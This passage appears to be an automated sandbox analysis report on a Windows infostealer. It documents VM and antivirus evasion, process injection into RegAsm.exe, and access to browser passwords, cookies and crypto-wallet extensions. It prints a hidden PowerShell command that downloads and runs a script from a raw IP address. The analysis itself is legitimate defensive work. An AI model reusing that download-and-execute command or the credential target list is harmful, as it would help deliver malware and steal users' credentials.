              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3616, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | System information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4457
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5346
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7108 | Thread sleep time: -13835058055282155s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492 | Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 4588 | Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7204 | Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Adobe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Packages
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Mozilla
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\PeerDistRepub
              Source: mshta.exe, 00000000.00000003.1676018400.00000000007F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}F}p8
              Source: svchost.exe, 00000003.00000002.2909186871.0000027EDF62B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2911362935.0000027EE4A57000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.1983377456.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.1983377456.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000001.00000002.1779801283.00000000031DB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWrw
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 7_2_0043B480 LdrInitializeThunk, 7_2_0043B480
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: 1.2.powershell.exe.5680f68.0.raw.unpack, Engineers.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref libraryName), ref methodName), typeof(T))
              Source: 1.2.powershell.exe.5680f68.0.raw.unpack, Engineers.cs | Reference to suspicious API methods: VirtualAllocEx(processInfo.ProcessHandle, num3, length, 12288, 64)
              Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File written: C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.0.cs
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 453000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9F5008
              Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iwr -useb http://45.131.135.227/tbhy.ps1 | iex"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.cmdline"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.cmdline"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3BAA.tmp" "c:\Users\user\AppData\Local\Temp\mvgjodmb\CSC1DCFE1A1CB594C5687CEBA7BEDB98DA4.TMP"
              Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
              Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
              Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
              Source: C:\Windows\SysWOW64\mshta.exe | Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
              Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: RegAsm.exe, 00000007.00000002.1983377456.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match | File source: sslproxydump.pcap, type: PCAP
              Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
